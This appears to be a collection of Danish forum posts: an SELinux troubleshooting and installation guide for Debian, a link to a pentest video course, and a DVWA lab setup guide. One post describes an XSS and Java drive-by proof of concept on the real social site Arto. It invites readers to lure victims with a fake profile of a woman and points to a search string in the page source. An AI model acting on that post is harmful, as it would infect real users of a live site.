Så vil det ikke være muligt for Apache2s address space, at lytte på andre porte. Men det kan være, man ønsker at køre software som webmin eller lign., som normalt lytter på tcp port 10000.
Så er man nød til at ændre http_port_t, så apache2 får lov til at lytte på den ønskede port.
Dette kan også gøres med semanage, med følgende kommando:

Citer:#semanage port -a -t http_port_t -p tcp 10000

Ønsker man at se, de porte der er registreret i SELinux, kan man gøre det med kommandoen semanage. Der er en hel del, da det svarer meget til /etc/hosts.
Her kan vi se, hvilke porte der er tilknyttet ftp:

Citer:root@selinux:~# semanage port -l |grep ftp
ftp_data_port_t tcp 20
ftp_port_t tcp 21, 990
ftp_port_t udp 990
tftp_port_t udp 69
root@selinux:~#

Hvad gør man så, når det ikke virker? Hvis man har installeret auditd pakken, vil der komme meddelelser i /var/log/audit/audit.log, og det vil jeg bestemt anbefale.
Ellers må man undersloge /var/log/messages for output.
Outputtet er lidt finurligt, og tidsstemplingen er i et forunderligt format.
For at få noget at se på, har jeg started exim op igen:

Citer:root@selinux:/usr/bin# service exim4 start
[ ok ] Starting MTA: exim4.
root@selinux:/usr/bin# tail /var/log/audit/audit.log
type=AVC msg=audit(1418516379.429:29): avc: denied { read write } for pid=3148 comm="hostname" path="socket:[6167]" dev=sockfs ino=6167 scontext=system_u:system_r:hostname_t:s0-s0:c0.c1023 tcontext=system_u:system_r:dhcpc_t:s0-s0:c0.c1023 tclass=udp_socket
type=SYSCALL msg=audit(1418516379.429:29): arch=c000003e syscall=59 success=yes exit=0 a0=262adc8 a1=262aea8 a2=260cc08 a3=0 items=0 ppid=3146 pid=3148 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="hostname" exe="/bin/hostname" subj=system_u:system_r:hostname_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(1418516952.974:30): avc: denied { search } for pid=3417 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=SYSCALL msg=audit(1418516952.974:30): arch=c000003e syscall=2 success=no exit=-13 a0=7f5453269b10 a1=0 a2=1b6 a3=0 items=0 ppid=3416 pid=3417 auid=0 uid=101 gid=104 euid=101 suid=101 fsuid=101 egid=104 sgid=104 fsgid=104 tty=pts0 ses=1 comm="exim4" exe="/usr/sbin/exim4" subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(1418516953.118:31): avc: denied { search } for pid=3422 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=SYSCALL msg=audit(1418516953.118:31): arch=c000003e syscall=2 success=no exit=-13 a0=7fbf62c29b10 a1=0 a2=1b6 a3=0 items=0 ppid=3421 pid=3422 auid=0 uid=101 gid=104 euid=101 suid=101 fsuid=101 egid=104 sgid=104 fsgid=104 tty=pts0 ses=1 comm="exim4" exe="/usr/sbin/exim4" subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(1418516953.282:32): avc: denied { search } for pid=3425 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=SYSCALL msg=audit(1418516953.282:32): arch=c000003e syscall=2 success=no exit=-13 a0=7f0710c0ab10 a1=0 a2=1b6 a3=0 items=0 ppid=3424 pid=3425 auid=0 uid=101 gid=104 euid=101 suid=101 fsuid=101 egid=104 sgid=104 fsgid=104 tty=pts0 ses=1 comm="exim4" exe="/usr/sbin/exim4" subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(1418516953.418:33): avc: denied { search } for pid=3433 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=SYSCALL msg=audit(1418516953.418:33): arch=c000003e syscall=2 success=no exit=-13 a0=7ff878797b10 a1=0 a2=1b6 a3=0 items=0 ppid=3431 pid=3433 auid=0 uid=101 gid=104 euid=101 suid=101 fsuid=101 egid=104 sgid=104 fsgid=104 tty=(none) ses=1 comm="exim4" exe="/usr/sbin/exim4" subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
root@selinux:/usr/bin#

For at skille, hvad der er gået godt, og hvad der ikke er, kan man med fordel bruge grep. En ting man kan søge på, er "denied", en anden ting er AVC.
Når der i SELinux opstår en access violation, altså når en policy ikke er blevet overholdt, kommer der en AVC (Access Vector Cache) besked.
Denne kan man greppe efter:

Citer:root@selinux:/usr/bin# tail /var/log/audit/audit.log |grep AVC
type=AVC msg=audit(1418516379.429:29): avc: denied { read write } for pid=3148 comm="hostname" path="socket:[6167]" dev=sockfs ino=6167 scontext=system_u:system_r:hostname_t:s0-s0:c0.c1023 tcontext=system_u:system_r:dhcpc_t:s0-s0:c0.c1023 tclass=udp_socket
type=AVC msg=audit(1418516952.974:30): avc: denied { search } for pid=3417 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=AVC msg=audit(1418516953.118:31): avc: denied { search } for pid=3422 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=AVC msg=audit(1418516953.282:32): avc: denied { search } for pid=3425 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=AVC msg=audit(1418516953.418:33): avc: denied { search } for pid=3433 comm="exim4" name="crypto" dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
root@selinux:/usr/bin#

En bedre måde at søge efter disse fejl på, er at bruge en af de gode linux audit værktøjer, der kommer prepacked fra distributøren.
Et af dem er ausearch, som er bygget til at søge i daemon logs.

OBS: ausearch er i pakken auditd, som også giver /var/log/audit/audit.log filen.

Her kan vi se, hvordan de samme beskeder fra exim4 processen er opstillet gennem ausearch. Dette er en søgning på AVC beskeder som ikke er gået godt:

Citer:root@selinux:/usr/bin# ausearch -i -m AVC,USER_AVC -sv no
----
type=SYSCALL msg=audit(13-12-2014 21:55:00.491:10) : arch=x86_64 syscall=bind success=no exit=-13(Adgang nÃ¦gtet) a0=7 a1=7feb2dbfd260 a2=6e a3=7feb2b47714c items=0 ppid=1 pid=2446 auid=unset uid=postgres gid=postgres euid=postgres suid=postgres fsuid=postgres egid=postgres sgid=postgres fsgid=postgres tty=(none) ses=4294967295 comm=postgres exe=/usr/lib/postgresql/9.1/bin/postgres subj=system_u:system_r:postgresql_t:s0 key=(null)
type=AVC msg=audit(13-12-2014 21:55:00.491:10) : avc: denied { create } for pid=2446 comm=postgres name=.s.PGSQL.5432 scontext=system_u:system_r:postgresql_t:s0 tcontext=system_u:object_r:var_run_t:s0 tclass=sock_file
----
type=SYSCALL msg=audit(14-12-2014 01:29:13.118:31) : arch=x86_64 syscall=open success=no exit=-13(Adgang nÃ¦gtet) a0=7fbf62c29b10 a1=0 a2=1b6 a3=0 items=0 ppid=3421 pid=3422 auid=root uid=Debian-exim gid=Debian-exim euid=Debian-exim suid=Debian-exim fsuid=Debian-exim egid=Debian-exim sgid=Debian-exim fsgid=Debian-exim tty=pts0 ses=1 comm=exim4 exe=/usr/sbin/exim4 subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(14-12-2014 01:29:13.118:31) : avc: denied { search } for pid=3422 comm=exim4 name=crypto dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
----
type=SYSCALL msg=audit(14-12-2014 01:29:12.974:30) : arch=x86_64 syscall=open success=no exit=-13(Adgang nÃ¦gtet) a0=7f5453269b10 a1=0 a2=1b6 a3=0 items=0 ppid=3416 pid=3417 auid=root uid=Debian-exim gid=Debian-exim euid=Debian-exim suid=Debian-exim fsuid=Debian-exim egid=Debian-exim sgid=Debian-exim fsgid=Debian-exim tty=pts0 ses=1 comm=exim4 exe=/usr/sbin/exim4 subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(14-12-2014 01:29:12.974:30) : avc: denied { search } for pid=3417 comm=exim4 name=crypto dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
----
type=SYSCALL msg=audit(14-12-2014 01:29:13.282:32) : arch=x86_64 syscall=open success=no exit=-13(Adgang nÃ¦gtet) a0=7f0710c0ab10 a1=0 a2=1b6 a3=0 items=0 ppid=3424 pid=3425 auid=root uid=Debian-exim gid=Debian-exim euid=Debian-exim suid=Debian-exim fsuid=Debian-exim egid=Debian-exim sgid=Debian-exim fsgid=Debian-exim tty=pts0 ses=1 comm=exim4 exe=/usr/sbin/exim4 subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(14-12-2014 01:29:13.282:32) : avc: denied { search } for pid=3425 comm=exim4 name=crypto dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
----
type=SYSCALL msg=audit(14-12-2014 01:29:13.418:33) : arch=x86_64 syscall=open success=no exit=-13(Adgang nÃ¦gtet) a0=7ff878797b10 a1=0 a2=1b6 a3=0 items=0 ppid=3431 pid=3433 auid=root uid=Debian-exim gid=Debian-exim euid=Debian-exim suid=Debian-exim fsuid=Debian-exim egid=Debian-exim sgid=Debian-exim fsgid=Debian-exim tty=(none) ses=1 comm=exim4 exe=/usr/sbin/exim4 subj=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 key=(null)
type=AVC msg=audit(14-12-2014 01:29:13.418:33) : avc: denied { search } for pid=3433 comm=exim4 name=crypto dev=proc ino=11291 scontext=unconfined_u:system_r:exim_t:s0-s0:c0.c1023 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
root@selinux:/usr/bin#

Bemærk at tidsstemplingen nu er til at læse.
Nogle gange, kan man være nød til at rette eksisterende policies, men det anbefales at rapportere disse fejl til distributøren af pakken, så det kan blive rettet.
Måske skal man lave en policy til et program, man selv har lavet, og dette kan gøres med audit2allow, som kommer i policycoreutils pakken.
Man kan skrive sin policy i hånden, eller man kan vælge at tage de deny AVCs fra audit.log, og lade audit2allow lave en allow policy for dig.
Reelt set, kan man pipe indholdet fra /var/log/audit/audit.log direkte ind i audit2allow, men der er en god chance for, den policy man får ud i den anden ende, tillader lidt for meget.

Citer:#audit2allow < /var/log/audit/audit.log

Ovenstående må anses som at være aller sidste udvej.

Man kan f.eks. udstede følgende kommando, som laver en Type Enforcementrule, ud fra deny AVCs fra de sidste 5 minutter, der tillader denne handling:

Citer:#ausearch -i -m AVC -sv no -ts recent | audit2allow

Får man ikke hvad man forventer, skal man være opmærksom på, meddelelserne kan være mere end 5 minutter gamle. Se man eller info page for ausearch. De kan rigtig mange ting.
Her er et par søgninger:

Citer:root@selinux:~# ausearch -i -m AVC -sv no | grep exim4 | audit2allow

#============= exim_t ==============
allow exim_t sysctl_crypto_t:dir search;
root@selinux:~# ausearch -i -m AVC -sv no -se exim_t | audit2allow

#============= exim_t ==============
allow exim_t sysctl_crypto_t:dir search;
root@selinux:~#

Lad os prøve at lave en ny policy. Vær dog opmærksom på, du kan risikere at overskrive en eksisterende policy, hvis du vælger samme navn.

Citer:root@selinux:~# ausearch -i -m AVC -sv no -se exim_t | audit2allow -m ny-exim > ny-exim.te
root@selinux:~# cat ny-exim.te

module ny-exim 1.0;

require {
type sysctl_crypto_t;
type exim_t;
class dir search;
}

#============= exim_t ==============
allow exim_t sysctl_crypto_t:dir search;
root@selinux:~#

Så har vi dannet en ny policy. Denne skal så "kompileres, linkes og loades", før den virker.
Bemærk versionsnummeret i den. Denne er dannet med version 1.0, og det anbefales at ændre denne, hver gang, denne policy ændres.
Det gør det i hvert fald nemmere at holde hånd i hanke med, hvilken policy, der er den nyeste og formegntlig, den der er loaded ind i linux kernen.

Det næste trin er at danne en .mod fil og dette gøres med følgende kommando:

Citer:root@selinux:~# checkmodule -M -m -o ny-exim.mod ny-exim.te
checkmodule: loading policy configuration from ny-exim.te
checkmodule: policy configuration loaded
checkmodule: writing binary representation (version 14) to ny-exim.mod
root@selinux:~# ls -lZ ny*
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 923 dec 14 02:08 ny-exim.mod
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 169 dec 14 02:03 ny-exim.te
root@selinux:~#

Så skal vi have lavet en policy module package fra det binære policy modul. Der efter loades vores nye package ind i linux kernen, hvor SELinux lever:

Citer:root@selinux:~# semodule_package -o ny-exim.pp -m ny-exim.mod
root@selinux:~# ls -lZ ny*
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 923 dec 14 02:08 ny-exim.mod
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 939 dec 14 02:13 ny-exim.pp
-rw-r--r--. 1 root root unconfined_u:object_r:user_home_t:SystemLow 169 dec 14 02:03 ny-exim.te
root@selinux:~# semodule --install ny-exim.pp
root@selinux:~#

Det tager lidt tid at loade modulet, men det er normalt. Jeg har ladet mig fortælle, der kan gå lidt tid, før modulet rent faktisk bliver aktivt.
Lad os prøve at tømme audit.log og genstarte exim4. Hvis vi ikke får nogen AVCer, lader det til, vores nylavede policy virker:

Citer:root@selinux:~# service exim4 stop
[ ok ] Stopping MTA: exim4_listener.
root@selinux:~# rm /var/log/audit/audit.log
root@selinux:~# touch /var/log/audit/audit.log // Måske skal man efter denne kommando, lave en restorecon /var/log/audit/audit.log
root@selinux:~# service exim4 start
[ ok ] Starting MTA: exim4.
root@selinux:~# cat /var/log/audit/audit.log
root@selinux:~#

Virker den policy man har lavet, ikke efter hensigten, kan den unloades med samme kommando, som den blev loaded med, bare med --remove i stedet for --install.

Citer:root@selinux:~# semodule --remove ny-exim.pp
root@selinux:~#

Når man tester sin SELinux installation, og arbejdet med nogle problemer, har man den mulighed, at sætte hele sytemet i Permissive mode.
Så kan man debugge, ved at se i /var/log/audit.log, men slippe for, at systemet ikke virker.
Hvis man vælger at gøre dette, skal man selvfølgelig være opmærksom på, man har fravalgt SELinux beskyttelsen for hele systemet, og det kan potentielt, efterlade systemet åbent, mens du arbejder.
En anden og måske bedre måde, er at sætte Permissive mode på den enkelte process, i stedet for hele systemet.
Så har resten af systemet sikkerheden fra SELinux, mens man frit kan arbejde med den process, der giver problemer.

Citer:#semanage permissive -a exim_t // Tillader at exim4 kører permissive, selv om resten af systemet kører enforced.
#semanage permissive -d exim_t // Fjerner tilladelsen, så exim4 ikke længere må bryde sin policy.
#semanage permissive -l // Lister de tilladelser der er givet, til at køre permissive.

Jeg skal dog sige, jeg ikke kan få ovenstående til at virke lige nu.

For at få adgang til filer og andet, skal man selvfølgelig også have adgang via DACs RWX.
Der er rigtig meget læsestof i man og info pages.
SELinux er en god og nem måde at gøre en maskine lidt mere sikker på, og det brude faktisk ikke være opt-in, men opt-out, efter min mening.
Jeg vil dog ikke anbefale, at installere det på din legeplads. Og vær opmærksom på, det reelt er en chance for, du får lukket dig selv ude.
SELinux til Debian er efterhånden rimelig godt med. Der kan dog stadig være nogle udfordringer med nogle display managere, som skal have finpudset deres policies.
En anden ting man skal være opmærksom på er, at kommandoer udføres langsomt. Der er en del overhead, når man gør noget, hvor adgangen skal kontrolleres.
Det påvirker ikke daemons det store. De bliver et ekstra sekund på at starte, men når de først kører, burde man ikke mærke noget til det.

https://github.com/TresysTechnology/refpolicy/wiki
https://wiki.debian.org/SELinux/Setup?hi...etup%29%29

Install & config af SELinux på Debian Linux 7 (Wheezy)

Sun, 14 Dec 2014 04:42:09 +0100

Citer:Selinux 4 access control forms:
- Targeted Enforcement (TE) - Common
- Strict - (TE bare mere strict)
- Role Based Access Control (RBAC)
- Multi-Level Access (MLS)

MCS er Multi Category System, og er en arveart af MLS, med lidt ekstra på.
Denne guide viser hvordan TE sættes op, da det er det mest brugte.

Citer:apt-get install selinux-basics # for check-selinux-installation og selinux-activate
apt-get install auditd # for /var/log/audit/audit.log
apt-get install rcconf # Valgfrit. Bruges til at ændre initscripts i den aktuelle runlevel.

OBS: selinux-policy-default og policycoreutils kommer automatisk med, på grund af package dependencies, så der er ingen grund til at angive dem.

Vi kan starte med at bekræfte at SELinux ikke kører:

Citer:root@selinux:~# sestatus
SELinux status: disabled
root@selinux:~#

For at kontrollere, om SELinux er klar til at blive startet, udføres følgende:

Citer:root@selinux:~# check-selinux-installation
getfilecon: getfilecon(/proc/1) failed
SELinux is not enabled.
Could not read the domain of PID 1.
/etc/pam.d/login is not SELinux enabled
FSCKFIX is not enabled - not serious, but could prevent system from booting...
root@selinux:~#

Der er nogle ting som skal ordnes, før vi kan aktivere SELinux:
"FSCKFIX is not enabled" klares som følgende:
I filen /etc/default/rcS skal vi have sat FSCKFIX til yes i stedet for no.

Den er normalt bare en kommentar:

Citer:...
# automatically repair filesystems with inconsistencies during boot
#FSCKFIX=no
...

Ret den til følgende:

Citer:...
# automatically repair filesystems with inconsistencies during boot
FSCKFIX=yes
...

Så kontrollerer vi installationen igen:

Citer:root@selinux:~# check-selinux-installation
getfilecon: getfilecon(/proc/1) failed
SELinux is not enabled.
Could not read the domain of PID 1.
/etc/pam.d/login is not SELinux enabled
root@selinux:~#

Det er de færreste programmer, som behøver blive ændret eller recompiled, for at køre i et SELinux miljø.
Disse få, er dog ret vigtige. Nogle af de programmer som er "SELinux Aware" er:
login, sshd, cron etc.

Lad os se på følgende fejl:
/etc/pam.d/login is not SELinux enabled

Disse PAM moduler, bliver automatisk rettet, når man kører "selinux-activate".
Det samme gælder opsætningen i grub.
Når denne kommando gives, bliver filen "/.autorelabel" også dannet.
Hvis denne fil findes, når en SELinux installation booter, vil der blive dannet Labels, og dette kan tage en del tid.

Så lad os prøve at aktivere SELinux, og se om det går godt:

Citer:root@selinux:~# selinux-activate
Activating SE Linux
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-3.2.0-4-amd64
Found initrd image: /boot/initrd.img-3.2.0-4-amd64
done
SE Linux is activated. You may need to reboot now.
root@selinux:~#

Og efterfølgende, rebooter vi linux:

Citer:root@selinux:~# reboot
root@selinux:~#

Dette kan tage lidt tid, så opstarten vil ikke være så hurtig som normalt.
Når vi har bootet, kan vi kontrollere om SELinux er aktiveret:

Citer:root@selinux:~# sestatus
SELinux status: enabled
SELinuxfs mount: /sys/fs/selinux
SELinux root directory: /etc/selinux
Loaded policy name: default
Current mode: permissive
Mode from config file: permissive
Policy MLS status: enabled
Policy deny_unknown status: denied
Max kernel policy version: 26
root@selinux:~#

Og vi kan kontrollere om installationen er, som den skal være:

Citer:root@selinux:~# check-selinux-installation

/etc/pam.d/login is not SELinux enabled
root@selinux:~#

Lige nu kører vi i Permissive Mode, hvilket betyder at vi stadig kan alt hvad vi kunne før, vi får dog nu, alarmer når vi gør noget vi ikke må.
Faktisk lige som når man kører DAC (Discresionary Access Mode), som man gør uden SELinux.
Permissive mode, er kun til at teste om alt virker. Dvs. om vi kan det vi skal kunne, så vi ikke ender med at lukke os selv ude.

For at køre i MAC (Mandatory Access Control) mode, skal vi have sat SELinux i Enforcing mode i stedet for Permissive Mode.

Inden vi gør det, kan det være en god idé at kigge i audit.log, som SELinux lægger sine log entries i.

Citer:root@selinux:~# tail /var/log/audit/audit.log
type=SYSCALL msg=audit(1418501038.226:9): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=7fc5ff434e50 a2=6e a3=0 items=0 ppid=2440 pid=2441 auid=4294967295 uid=104 gid=108 euid=104 suid=104 fsuid=104 egid=108 sgid=108 fsgid=108 tty=(none) ses=4294967295 comm="psql" exe="/usr/lib/postgresql/9.1/bin/psql" subj=system_u:system_r:postgresql_t:s0 key=(null)
type=AVC msg=audit(1418501042.669:10): avc: denied { search } for pid=2713 comm="exim4" name="crypto" dev=proc ino=6740 scontext=system_u:system_r:exim_t:s0 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=dir
type=AVC msg=audit(1418501042.669:10): avc: denied { read } for pid=2713 comm="exim4" name="fips_enabled" dev=proc ino=6741 scontext=system_u:system_r:exim_t:s0 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=file
type=AVC msg=audit(1418501042.669:10): avc: denied { open } for pid=2713 comm="exim4" name="fips_enabled" dev=proc ino=6741 scontext=system_u:system_r:exim_t:s0 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=file
type=SYSCALL msg=audit(1418501042.669:10): arch=c000003e syscall=2 success=yes exit=4 a0=7fe1a790ab10 a1=0 a2=1b6 a3=0 items=0 ppid=2712 pid=2713 auid=4294967295 uid=101 gid=104 euid=101 suid=101 fsuid=101 egid=104 sgid=104 fsgid=104 tty=(none) ses=4294967295 comm="exim4" exe="/usr/sbin/exim4" subj=system_u:system_r:exim_t:s0 key=(null)
type=AVC msg=audit(1418501042.669:11): avc: denied { getattr } for pid=2713 comm="exim4" path="/proc/sys/crypto/fips_enabled" dev=proc ino=6741 scontext=system_u:system_r:exim_t:s0 tcontext=system_u:object_r:sysctl_crypto_t:s0 tclass=file
type=SYSCALL msg=audit(1418501042.669:11): arch=c000003e syscall=5 success=yes exit=0 a0=4 a1=7fff95fbae00 a2=7fff95fbae00 a3=0 items=0 ppid=2712 pid=2713 auid=4294967295 uid=101 gid=104 euid=101 suid=101 fsuid=101 egid=104 sgid=104 fsgid=104 tty=(none) ses=4294967295 comm="exim4" exe="/usr/sbin/exim4" subj=system_u:system_r:exim_t:s0 key=(null)
type=LOGIN msg=audit(1418501049.988:12): login pid=2749 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=1
type=LOGIN msg=audit(1418501074.436:13): login pid=2799 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=2
type=LOGIN msg=audit(1418501821.801:14): login pid=2864 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=3
root@selinux:~#

Her kan det ses, at exim4, forsøger at gøre nogle ting, som ikke ville være tilladt, hvis SELinux var i Enforcing mode.
Man kan vælge at rette den policy, exim4 bruger, men exim4 skal alligevel ikke bruges, så denne fjernes med kommandoen rcconf:

Citer:root@selinux:~# rcconf --off exim4
update-rc.d: using dependency based boot sequencing
update-rc.d: warning: start runlevel arguments (none) do not match exim4 Default-Start values (2 3 4 5)
update-rc.d: warning: stop runlevel arguments (0 1 2 3 4 5 6) do not match exim4 Default-Stop values (0 1 6)
root@selinux:~#

Og så stopper vi exim4 processen:

Citer:root@selinux:~# service exim4 stop
[ ok ] Stopping MTA: exim4_listener.
root@selinux:~#

For en sikkerheds skyld, kan vi kontrollere at alt har fået labels:

Citer:root@selinux:~# fixfiles relabel

Files in the /tmp directory may be labeled incorrectly, this command
can remove all files in /tmp. If you choose to remove files from /tmp,
a reboot will be required after completion.

Do you wish to clean out the /tmp directory [N]? n
Relabeling / /dev /dev/pts /run /run/lock /run/shm /sys
**************************************************************
find: unknown predicate `-context'
find: unknown predicate `-context'
find: unknown predicate `-context'
find: unknown predicate `-context'
root@selinux:~#

De fire "find: unknown predicate `-context'" er harmløse.

Lad os sætte SELinux i Enforcing mode:

Citer:root@selinux:~# setenforce enforcing
root@selinux:~# sestatus
SELinux status: enabled
SELinuxfs mount: /sys/fs/selinux
SELinux root directory: /etc/selinux
Loaded policy name: default
Current mode: enforcing
Mode from config file: permissive
Policy MLS status: enabled
Policy deny_unknown status: denied
Max kernel policy version: 26
root@selinux:~#

Nu er SELinux kørende i Enforcing mode.
Som man kan se i ovenstående, er vores Current mode Enforcing, men Mode from config file, er Permissive.
Dette hjælper også med, ikke at få lukket sig selv ude, hvis man får lavet noget, for restriktivt.
Det sker dog normalt ikke, når man kører i Targeted Enforcement (TE) mode, hvor brugere generelt set, stadig får lov at være brugere.
Root er stadig root.

For at gøre dette permanent, skal man rette /etc/selinux/config, så man kører enforcing, også efter en reboot:

Citer:root@selinux:/etc/selinux# cat config
# This file controls the state of SELinux on the system.
# SELINUX= can take one of these three values:
# enforcing - SELinux security policy is enforced.
# permissive - SELinux prints warnings instead of enforcing.
# disabled - No SELinux policy is loaded.
SELINUX=permissive
# SELINUXTYPE= can take one of these two values:
# default - equivalent to the old strict and targeted policies
# mls - Multi-Level Security (for military and educational use)
# src - Custom policy built from source
SELINUXTYPE=default

# SETLOCALDEFS= Check local definition changes
SETLOCALDEFS=0
root@selinux:/etc/selinux#

Sæt SELINUX til enforcing, SELINUX=enforcing i /etc/selinux/config

For at være sikker på, ingen retter i denne, kan man sætte filen til at være immutable, så ikke engang root kan ændre eller slette filen:

Citer:root@selinux:/etc/selinux# chattr +i /etc/selinux/config
root@selinux:/etc/selinux# lsattr /etc/selinux/
-------------e-- /etc/selinux/semanage.conf
-------------e-- /etc/selinux/default
----i--------e-- /etc/selinux/config
-------------e-- /etc/selinux/restorecond_user.conf
-------------e-- /etc/selinux/restorecond.conf
root@selinux:/etc/selinux#

Done! God fornøjelse.

FULD Pentest guide !

Thu, 13 Nov 2014 14:22:13 +0100

Hej folkens

"Share the gold" et glimrende koncept. Jeg fandt denne her video tutorial på youtube, som jeg selv finder helt genial.

Hvis man ligesom jeg selv i starten, har problemer med at forstå hele konceptet omkring at finde og exploite sårbarheder, er denne video tutorial perfekt.

Der bliver gennemgået alle basic tools til at penteste både boxe og webapplikationer. Der er 98 videoer, som eftersigende, skulle gennemgå alt kursus materialet for SANS "Ethical Hacking" kurset.

Det er en blanding af "Hands-on" og koncept forklaring, og giver en rigtig god indsigt i hvor man kan starte ud.

Jeg vil foreslå alle "ny interesserede" at se den her video tutorial igennem, da den spare en for et TON af spørgsmål som man nok sidder med i starten :)

Jeg håber det kan bruges:

https://www.youtube.com/playlist?list=PL...UWhno_SU0L

Love the colors? :P

//Kav

Ps. Jeg har selv gennemgået hele kurset, så hvis man har brug for hjælp eller forklaring, er i velkomne til at hive fat i mig.

Arto og JDB/Java Drive By (Proof of concept)

Sun, 12 Oct 2014 19:18:16 +0200

Er sikker på at de fleste er rimelig familiære med Arto, og i ved sikkert også at det er brugt af rigtig mange personer i alle aldre.

Jeg har tidligere bevist at XSS ikke er noget problem (persistent vel og mærket!).
Så nu kiggede jeg lidt på det igen, og fandt så ud af at det er muligt at ligge en JDB på sin profil.

JEG HAR IKKE GJORT DET ENDNU, DET ER BLOT "PROOF OF CONCEPT"

http://www.arto.com/section/user/profile/?id=5796240
Dette link leder til en profil som "indeholder" en JDB. Dette er selvfølgelig ikke tilfældet, da jeg ikke vil infect jer! Men den fortæller dig at browseren gerne vil installere et plugin. Chrome blokere det, og sætter en lille label i URL adresse baren, hvor der står plugin er blokeret. Firefox beder om lov til at bruge Java.

Det var en lille sjov idé som jeg nok tænkte at nogle af jer kunne bruge! Sæt et fake profil op, med en tøs der har nogle store jader, så er der garanteret trafik ;) Husk endelig filter og bruncreme! ;D

Tjek kildekoden på linket, og søg efter "indsæturlforjdbher" så kan i nok godt finde frem til resten Hvis ikke så PM, så skal jeg nok sende en lille forklaring

Det skal siges! Det kræver en hel del fin pudsning! og jeg er ikke selv mester i JDB, men hvis nu der skulle sidde nogle som er, så ville det jo kun være en god ting at dele

Opsætning af DVWA

Sat, 15 Mar 2014 12:14:59 +0100

Introduktion
Dette er en Quick-and-dirty guide til opsætning af DVWA. Med DVWA har du et lukket miljø hvor du lovligt kan teste XSS, SQLi, CSRF, Brute force og meget mere. Desuden har vi i arrangør teamet planer om at benytte DVWA til forskellige udfordringer, så det kan være nødigt at havde en lokal kopi af dette så man kan arbejde med disse udfoldninger i ro og mag.

Installation af WAMP
WAMP er en forkortelse for Windows, Apache, MySQL, PHP og en pendant til LAMP.
Den indeholder alle de nødvendige modulers til at køre en webserver lokalt på ens Windows computer.
Dette er en nødvendighed for at kunne opsætte DVWA. Installationen af WAMP er forholdsvis enkel og jeg vil derfor ikke komme nærmere ind på dette.
Skulle nogen havde problemer med opsætningen er I velkommen til at spørge.
Programmet kan hente her: http://www.wampserver.com/

Når WAMP er blevet installeret vil I kunne se et grønt ikon i trayen.
Dette indikere at Wamp er korrekt installeret og alle services kører.
Er ikonet gult eller rødt, er det et problem med en af Wamp services.
Igen er spørgsmål velkomne hvis dette skulle ske.

Installation af DVWA

DVWA står for Damn Vulnerable Web Application og er et milijø lavet specifikt til at være sårbart således man kan teste teste disse sårbarheder og hvordan man sikre mod dem.
Download DVWA fra: http://www.dvwa.co.uk/

1. Udpak den hentede fil DVWA-1.0.8.zip til C:\wamp\www\DVWA-1.0.8

DVWA skal bruge en database for at fungere korrekt. Databaseforbindelsen bliver defineret i filen config.inc.php.
For at gøre det så nemt som muligt vil vi i dette eksampel blot benytte databasen test som automatisk bliver oprettet ved installation af WAMP.
Da der som standard ikke er et password på denne er det eneste vi skal bruge brugernavnet root.

2. Åben filen C:\wamp\www\DVWA-1.0.8\config\config.inc.php

3. Ændre værdien for db_database til test

4. Fjern værdien for for db_password

5. Gem filen config.inc.php

6. Åbn en browser og tilgå localhost/DVWA-1.0.8/setup.php

7. Klik på knappen Create / reset Database

